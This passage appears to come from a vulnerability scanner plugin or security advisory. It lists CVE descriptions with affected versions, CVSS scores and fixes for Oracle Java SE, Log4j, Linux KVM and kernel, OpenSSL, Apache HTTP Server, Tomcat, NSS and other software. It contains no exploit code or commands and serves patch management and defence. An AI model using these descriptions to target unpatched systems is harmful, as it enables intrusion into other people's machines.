impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21277, CVE-2022-21366)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2022-21282, CVE-2022-21296)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21283)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21291, CVE-2022-21305)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21293, CVE-2022-21294, CVE-2022-21340)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21299)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21341)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21349)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21360, CVE-2022-21365)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. 
Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), because of a heap-based buffer overflow. (CVE-2021-45417)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. 
(CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. 
From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. 
Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. 
Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 
(CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). 
(CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. (CVE-2021-45105)\n\n - In various methods of hid-multitouch.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-162844689References: Upstream kernel (CVE-2020-0465)\n\n - In do_epoll_ctl and ep_loop_check_proc of eventpoll.c, there is a possible use after free due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-147802478References: Upstream kernel (CVE-2020-0466)\n\n - In unix_scm_to_skb of af_unix.c, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. 
User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196926917References:\n Upstream kernel (CVE-2021-0920)\n\n - A double-free memory corruption flaw in the Linux kernel HCI device initialization subsystem was found in the way a user attaches a malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the system. This flaw affects all the Linux kernel versions starting from 3.13. (CVE-2021-3564)\n\n - A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way a user calls ioctl HCIUNBLOCKADDR or otherwise triggers a race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5. (CVE-2021-3573)\n\n - A use-after-free flaw was found in the Linux kernel's Bluetooth subsystem in the way a user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3752)\n\n - A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them. (CVE-2021-4155)\n\n - A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or escalate their privileges on the system. 
(CVE-2022-0330)\n\n - A use-after-free flaw was found in the Linux kernel's vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx. This flaw allows a local attacker with user privileges to cause a privilege escalation problem. (CVE-2022-22942)\n\n - A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP's slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability. (CVE-2020-25709)\n\n - A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this vulnerability is to system availability. (CVE-2020-25710)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. 
(CVE-2020-9484)\n\n - The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore. (CVE-2022-23181)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow (CVE-2021-26691)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. (CVE-2021-44790)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability. 
